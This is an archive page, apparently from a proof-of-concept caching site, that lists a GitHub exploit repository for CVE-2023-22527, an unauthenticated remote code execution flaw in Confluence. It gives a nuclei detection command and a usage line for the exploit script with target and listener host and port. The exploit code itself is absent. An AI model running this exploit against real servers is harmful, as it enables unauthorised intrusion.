CVE-2023-22527 PoC — Atlassian Confluence 安全漏洞

Source

https://github.com/thanhlam-attt/CVE-2023-22527

Associated Vulnerability

Title:Atlassian Confluence 安全漏洞 (CVE-2023-22527)
Description:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞，该漏洞源于存在模板注入漏洞，允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。

Readme

# CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server
# PoC
## Detect
`nuclei -v -t /path/to/template.yam; -u http://ip:port/`

![snapedit_1706203984065](https://github.com/thanhlam-attt/CVE-2023-22527/assets/79523444/d4747dd3-98f9-4dd7-ac62-6d8495fcb374)


## Exploit
`python3 CVE-2023-22527.py -u ip:port -lh listen-host -lp listen-port`

![snapedit_1706204311967](https://github.com/thanhlam-attt/CVE-2023-22527/assets/79523444/97e0d2a2-d360-4e75-80d0-70aca5e51537)

File Snapshot


 [4.0K]  /data/pocs/34bb49e6adbbab9d639747986b595485b8f53aba
├── [5.7K]  CVE-2023-22527.py
├── [ 887]  CVE-2023-22527.yaml
└── [ 524]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!